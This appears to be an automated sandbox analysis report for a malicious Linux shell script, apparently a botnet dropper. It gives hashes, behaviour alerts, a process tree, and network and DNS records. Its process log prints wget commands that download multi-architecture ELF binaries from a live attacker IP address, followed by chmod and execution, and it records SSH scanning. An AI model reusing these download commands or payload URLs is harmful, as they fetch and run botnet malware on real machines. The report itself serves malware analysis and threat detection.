File name:

a.sh

Full analysis: https://app.any.run/tasks/ebdf4466-7a70-4e5f-989f-c04be41a1b69
Verdict: Malicious activity
Analysis date: December 11, 2024, 06:39:47
OS: Ubuntu 22.04.2 LTS
Tags:
opendir
scan
ssh
sshscan
telnet
Indicators:
MIME: text/plain
File info: ASCII text
MD5:

405E283551E715143E5A87905BC97924

SHA1:

6B38C72F44124A59195C98D208CB7E5E5C625F36

SHA256:

A2C49F166BEA329F0539C741DD8999A862DABC501E9EC984878A535DF50DF164

SSDEEP:

48:6lXlvXjaXw8kMX6ZOXKx7XJ+XGCXf63Xmx1hr7X51xnVjJfn:6NlPjcwC6Z4KxTJoGUinmx1hrT51xnVJ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • SSHSCAN has been detected (SURICATA)

      • x86 (deleted) (PID: 38905)

    • Attempting to scan the network

      • x86 (deleted) (PID: 38905)

    • Attempting to connect via SSH

      • x86 (deleted) (PID: 38905)

  • SUSPICIOUS

    • Modifies file or directory owner

      • sudo (PID: 38759)

    • Executes commands using command-line interpreter

      • sudo (PID: 38762)

    • Uses wget to download content

      • bash (PID: 38764)

    • Potential Corporate Privacy Violation

      • wget (PID: 38773)
      • wget (PID: 38766)
      • wget (PID: 38783)
      • wget (PID: 38778)
      • wget (PID: 38790)
      • wget (PID: 38796)
      • wget (PID: 38805)
      • wget (PID: 38810)
      • wget (PID: 38815)
      • x86 (deleted) (PID: 38905)

    • Connects to the server without a host name

      • wget (PID: 38766)
      • wget (PID: 38778)
      • wget (PID: 38783)
      • wget (PID: 38773)
      • wget (PID: 38790)
      • wget (PID: 38805)
      • wget (PID: 38796)
      • wget (PID: 38815)
      • wget (PID: 38810)

    • Executes the "rm" command to delete files or directories

      • bash (PID: 38764)

    • Reads /proc/mounts (likely used to find writable filesystems)

      • x86 (deleted) (PID: 38825)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
288
Monitored processes
79
Malicious processes
13
Suspicious processes
1

Behavior graph

Click at the process to see the details
start dash no specs sudo no specs chown no specs chmod no specs sudo no specs bash no specs locale-check no specs wget dash no specs chmod no specs bash no specs rm no specs wget chmod no specs bash no specs rm no specs wget chmod no specs bash no specs rm no specs wget chmod no specs bash no specs rm no specs wget chmod no specs bash no specs rm no specs wget systemctl no specs systemctl no specs chmod no specs bash no specs rm no specs wget chmod no specs bash no specs rm no specs wget chmod no specs bash no specs rm no specs wget chmod no specs x86 no specs rm no specs snap no specs x86 (deleted) x86 (deleted) no specs snap-seccomp no specs tracker-extract-3 no specs dash no specs dash no specs ibus-daemon no specs ibus-dconf no specs ibus-extension-gtk3 no specs dbus-daemon no specs ibus-portal no specs dash no specs dash no specs ibus-daemon no specs dash no specs dash no specs ibus-daemon no specs dbus-daemon no specs ibus-dconf no specs ibus-extension-gtk3 no specs ibus-portal no specs #SSHSCAN x86 (deleted) dash no specs dash no specs ibus-daemon no specs dash no specs dash no specs ibus-daemon no specs dbus-daemon no specs ibus-dconf no specs ibus-extension-gtk3 no specs ibus-portal no specs

Process information

PID
CMD
Path
Indicators
Parent process
38758/bin/sh -c "sudo chown user /home/user/Desktop/a\.sh && chmod +x /home/user/Desktop/a\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/a\.sh "/usr/bin/dashany-guest-agent
User:
user
Integrity Level:
UNKNOWN
Exit code:
35072
38759sudo chown user /home/user/Desktop/a.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
38760chown user /home/user/Desktop/a.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
38761chmod +x /home/user/Desktop/a.sh/usr/bin/chmoddash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
38762sudo -iu user /home/user/Desktop/a.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
9
38764-bash --login -c \/home\/user\/Desktop\/a\.sh/usr/bin/bashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
9
38765/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
38766wget http://62.60.244.220/arc -O -/usr/bin/wget
bash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
38767/bin/sh -e /etc/NetworkManager/dispatcher.d/01-ifupdown connectivity-change/usr/bin/dashnm-dispatcher
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
38769chmod 777 arc/usr/bin/chmodbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Executable files
0
Suspicious files
5
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
38766wget/home/user/arcbinary
MD5:
SHA256:
38783wget/home/user/arm7binary
MD5:
SHA256:
38790wget/home/user/mips (deleted)binary
MD5:
SHA256:
38796wget/home/user/mpslbinary
MD5:
SHA256:
38815wget/home/user/x86binary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
23
TCP/UDP connections
6 858
DNS requests
75
Threats
94

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
204
185.125.190.49:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
204
185.125.190.97:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
185.125.190.97:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
38805
wget
GET
200
62.60.244.220:80
http://62.60.244.220/ppc
unknown
unknown
38773
wget
GET
200
62.60.244.220:80
http://62.60.244.220/arm
unknown
unknown
488
NetworkManager
GET
204
91.189.91.98:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
195.181.170.18:443
https://odrs.gnome.org/1.0/reviews/api/ratings
unknown
38778
wget
GET
200
62.60.244.220:80
http://62.60.244.220/arm5
unknown
unknown
38783
wget
GET
200
62.60.244.220:80
http://62.60.244.220/arm7
unknown
unknown
38766
wget
GET
200
62.60.244.220:80
http://62.60.244.220/arc
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
185.125.190.97:80
Canonical Group Limited
GB
unknown
484
avahi-daemon
224.0.0.251:5353
unknown
185.125.190.49:80
Canonical Group Limited
GB
unknown
37.19.194.80:443
odrs.gnome.org
Datacamp Limited
DE
whitelisted
38766
wget
62.60.244.220:80
Iranian Research Organization for Science & Technology
HK
unknown
512
snapd
185.125.188.54:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
488
NetworkManager
91.189.91.98:80
Canonical Group Limited
US
unknown
38773
wget
62.60.244.220:80
Iranian Research Organization for Science & Technology
HK
unknown
38778
wget
62.60.244.220:80
Iranian Research Organization for Science & Technology
HK
unknown
512
snapd
185.125.188.55:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted

DNS requests

Domain
IP
Reputation
odrs.gnome.org
  • 37.19.194.80
  • 207.211.211.27
  • 195.181.175.41
  • 212.102.56.178
  • 169.150.255.184
  • 195.181.170.18
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::19
  • 2a02:6ea0:c700::107
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::112
whitelisted
google.com
  • 142.250.181.238
  • 2a00:1450:4001:82f::200e
whitelisted
api.snapcraft.io
  • 185.125.188.54
  • 185.125.188.55
  • 185.125.188.59
  • 185.125.188.58
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::42
  • 2620:2d:4000:1010::6d
  • 2620:2d:4000:1010::2e6
whitelisted
99.100.168.192.in-addr.arpa
unknown
trump2024.oss
unknown
liberalretard.libre
unknown
xaiverbot.net
unknown
connectivity-check.ubuntu.com
  • 2620:2d:4002:1::197
  • 2620:2d:4002:1::196
  • 2620:2d:4000:1::98
  • 2620:2d:4000:1::2b
  • 2620:2d:4000:1::96
  • 2620:2d:4000:1::2a
  • 2001:67c:1562::23
  • 2620:2d:4000:1::97
  • 2620:2d:4000:1::22
  • 2001:67c:1562::24
  • 2620:2d:4002:1::198
  • 2620:2d:4000:1::23
whitelisted

Threats

PID
Process
Class
Message
38766
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
38773
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
38778
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
38783
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
38790
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
38796
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
38805
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
38810
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
38815
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
38905
x86 (deleted)
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 22
No debug info